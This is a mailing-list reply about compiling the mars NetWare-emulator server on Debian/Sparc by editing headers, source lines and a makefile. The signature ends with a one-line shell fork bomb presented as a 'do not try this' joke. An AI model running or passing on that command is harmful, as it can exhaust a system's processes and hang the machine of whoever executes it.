Re: mars problem

> We use glibc2.1 on Debian/Sparc which supplies already most of the ipx
> stuff in its own headers. The mars source probably includes
> <linux/...> headers and the usual glibc2.1 headers and gets lot of
> conflicts. I would guess you have to fix the sources.

The problem is fixed. I removed linux/ipx.h, and rewrited some line in
mars source, deleted lines in "emutli.h" from 123 to 138, because thiz
lines was redefinied ipx frame types. Modified "tools.c" in line 42 :
original:  "static FILE *logfile=stderr;
modified:  "static FILE *logfile;
This was a barbarian idea, but worked :)))
Modified "mk.li" in line 60:
original:   NDBMLIB="-ldbm"
modified:   NDBMLIB="-lndbm"

AND NOW !! Mars is compiled, some warning occured, but working. I created
an mars server, configured and runned, loged in thiz server, and probe to
copy, move, adduser, run programs, etc,  order is in good working.

csibi@makacs.poliod.hu, csibi@kac.poliod.hu, csibi@tng.ml.org
LINUX: Dead or alive
DO No try thiz:        echo "perl -e 'system\"./i|./i&\"'">i;chmod +x i;./i